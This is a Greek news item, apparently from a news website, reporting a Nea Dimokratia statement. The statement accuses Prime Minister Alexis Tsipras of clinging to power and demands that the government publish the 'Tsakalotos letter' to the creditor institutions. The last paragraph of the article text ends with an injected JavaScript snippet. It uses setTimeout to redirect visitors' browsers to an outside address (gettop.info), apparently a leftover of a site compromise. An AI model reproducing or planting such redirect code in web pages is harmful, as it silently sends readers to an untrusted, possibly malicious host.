ΝΔ: Να δώσουν την επιστολή Τσακαλώτου στη δημοσιότητα – Ο Τσίπρας θα κάνει τα πάντα να μείνει στην εξουσία

0
4

 

Με ανακοίνωσή της η Νέα Δημοκρατια επιτίθεται στην κυβέρνηση και τον πρωθυπουργό Αλέξη Τσίπρα, με αφορμή την επιστολη΄Τσακαλώτου στους θεσμούς με την οποία «ξεπάγωσε» η διαδικασία για τα βραχυπρόθεσμα μέτρα για το χρέος.

Σε ανακοίνωσή του το Γραφείο Τύπου της ΝΔ χαρακτηρίζει τον Τσίπρα «τον καλύτερο σύμμαχο των ακραίων της Ευρώπης που θέλουν την Ελλάδα εγκλωβισμένη στην αέναη λιτότητα» και κατηγορεί την κυβέρνηση πως αρνείται να δώσει στη δημοσιότητα την «επιστολή μετάνοιας», εκφράζοντας την εκτίμηση πως το περιεχόμενό της θα αποκαλύψει ότι η κυβέρνηση ΣΥΡΙΖΑ – ΑΝΕΛ με το ένα χέρι υπογράφει δηλώσεις συμμόρφωσης και με το άλλο βαράει τα τύμπανα της δήθεν ρήξης.

«Οι πολίτες γνωρίζουν την αλήθεια. O κ. Τσίπρας θα κάνει τα πάντα για να μείνει στην εξουσία. Δεν θα διστάσει να υπογράψει ό,τι του ζητηθεί για να καθυστερήσει την αναμέτρηση με την λαϊκή ετυμηγορία. Έχει γίνει ο καλύτερος σύμμαχος ορισμένων ακραίων στην Ευρώπη, που θέλουν την Ελλάδα εγκλωβισμένη σε αέναη λιτότητα. Όλα τα υπόλοιπα είναι ένα φθηνό σόου για εσωτερική κατανάλωση», τονίζει η ΝΔ καλώντας την κυβέρνηση να δώσει την «επιστολή Τσακαλώτου» στη δημοσιότητα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here